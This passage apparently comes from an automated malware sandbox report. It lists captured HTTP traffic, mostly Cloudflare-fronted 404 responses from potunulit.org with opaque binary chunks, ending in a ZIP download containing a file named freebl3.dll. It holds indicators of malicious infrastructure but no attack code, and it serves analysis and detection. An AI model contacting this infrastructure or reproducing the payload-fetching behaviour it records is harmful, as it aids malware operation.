75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:28:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LPBQ0R%2BRu90dgKbnSJxu7DRt9hMQErmqD1bDt7CrUko97h2bxjC92tMWtb1bAh7V%2FoxGdmK4BcAx0ruPYryKnwonItHvcBTMhVZXGva2tbGroJPnstXvmkRSY%2BLxb7xM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d0d44d819a33-FRAalt-svc: h3=":443"; ma=86400Data Raw: 33 36 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 94 02 c5 5b c0 ff 01 b1 2c e2 23 41 5c 39 f3 7f 4a 67 83 55 66 1f 74 c1 e2 8d b2 d1 21 dc 28 3a 50 20 0d 0a Data Ascii: 36Uys/~(u:R[,#A\9JgUft!(:P
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:28:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DYzLmQeeumfnuMxeQiuZSrwKChCwBb87i1HmuOEzLin0pIoidfVNGiD0QCu4ngGKove0kUq%2BVe1Iba2RZU4OQYdEQ%2BhzInba%2F5yQL%2FZL20fFhUtLWMaANqtaZI0yi8JD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d11c49a95b32-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:28:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xoDuUOqzbOlaWrvU7efs4bU6tChbnBuXBrQSaz8OsYztWeBTRaaP3jSUizsgU%2FP%2B4hNfq5YWcvPqN7NeeX9B7830fCiZOvpDEEgeNjjU%2FsR3dp2Q40i5Rt4AYqEOP6LT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d11d7a005b32-FRAalt-svc: h3=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 dd 73 d4 74 c4 ec c2 1d 68 bc 39 d1 b4 2f e5 12 2f bd 46 33 4c 11 08 1b bc 09 dd 90 a5 df e3 d2 8d d2 20 a4 71 f7 87 a5 e8 c6 15 dd 1b dd 81 1f 4a ca 68 9e db 8e ed c9 76 3d 30 3c 95 56 0b a2 4d e6 17 47 8e 1e 9d b4 38 2b 15 ba be bd c9 31 bf 6c 13 d9 55 ca 88 ab 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 06 d0 25 77 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e ad fe ff 78 35 05 db c4 0d 13 13 3b 45 e1 92 24 18 4f c5 03 a1 c1 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ca af 96 be 21 51 61 22 a9 32 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 5f 11 ed 0e c0 eb 7e 71 eb f0 ad 1a b0 9a 48 d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 bb 70 b9 a6 e5 cc 23 b2 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f fb fb cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d cb 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 17 8d d6 8e 82 11 e8 e4 1f b6 a8 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 b0 79 cb 1f d4 5c 62 91 9c 17 06 f1 2c b2 a7 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 14 b8 89 8b e1 12 22 d7 9c 8a c1 e0 2b 83 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c e1 6f f5 52 48 44 60 96 4d 9b e7 17 3f f0 e9 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGsth9//F3L qJhv=0<VMG8+1lU3Ob>!ZC:>%wSSP{~x5;E$O
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:28:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oQQ%2Fyxftb%2F6TleJezy3XPHFJIeQDqSLz2iOgOQWAwSVYlSjTtLVsYkag0ZwIFwz5BJo4HA69YmDhUguaqbDBKYoHcB9i3yysNdMoVJCJmPM%2FFnLEabUPBHpIndcRYya6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d1208b415b32-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:28:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kLwvewcT8Lzhrh%2BzLXjIoAewAXEviH0u8S3iN%2FKx2F8xyoFyWPmiYjaCt7rTCxyfbO7bK9QRLj%2BepgL1P78qTiabV2wRlS69PBhmifEYXNw62m4PZFk3fivw8YMOWlUB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d1216b905b32-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1e 9a 1d d8 47 c7 fb 19 ed 2a fe 27 0a 5d 3b bf 64 11 6d 80 5c 67 0e 61 d4 0d 0a Data Ascii: 2cUys/~(`:G*'];dm\ga
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:28:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2xPqmfx6FPv35%2F6GFqfphTcP28uN2u6w5eZp7El%2BhN4%2FGG08iJ1Uc3nvSK%2F51CatR10CE6rgn27e0J51G%2FNHr3EfqvCWcDwQtTJLdEkx6v6w6BnxGVw%2FTG8w03iGKdpm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d13bee345b32-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:28:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dKsu2uLdymzajXJ1cy6QHHfTtYq6fjQAICOLYf%2B7tSKBZ%2Ft3JMBe9LgiDWg%2BNyXIYoZkefu%2BMEkscgZNb50YQpkqKn2ipZIWoNzLGEaHCPfH7LKaB3aG%2B2meqAtoZFxf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d13c7e675b32-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 36 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 49 c0 5f 88 1a 85 a2 4e fb 79 be 3d 44 55 3b be 63 1c 61 0d 0a Data Ascii: 26Uys/~(`:I_Ny=DU;ca
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:28:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EbuBBG%2BSF66FNazlGMrIA%2FF%2FLvOqmfALlxICSBBLPMag%2BTVi111YaNW57xVnejTMM9RkURqzDf3H8rcLCgQde%2B%2BbEVCLHqezTbdE8suuZ6g0qxMfiFKgKmnIUF9IzU4Y"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d14b3bc65b32-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:28:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KPHNOWXV2uonyYP6i0klou6oXaImGDR1A3m%2BvB%2BJtm0PJtR5usgWKMLY7xDDkaxe6lzIze437odch%2FletYZ4xNc5GK4t0zcxUfATlL1Q7ZcNZQ8EPPtoz0m%2Byyu0KzN2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d14c0c2d5b32-FRAalt-svc: h3=":443"; ma=86400Data Raw: 33 36 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 94 02 c5 5b c0 ff 01 b1 2c e2 23 41 5c 39 f3 7f 4a 67 83 55 66 1f 74 c1 e2 8d b2 d1 21 dc 28 3a 50 20 0d 0a Data Ascii: 36Uys/~(u:R[,#A\9JgUft!(:P
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:28:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yERgaZdwerslfvUGWYOgksanCkao0ddm3DLVEU3EzBoevAnHt2OvlVNUZbX0J9RhhmNojFCf4CXA0ObB%2FwUw393B301IdPNFz3E6NPI0nS6j%2FsRVls6oVh2QEGUnCUKt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d154dfbc5b32-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 21 Jun 2023 02:28:02 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
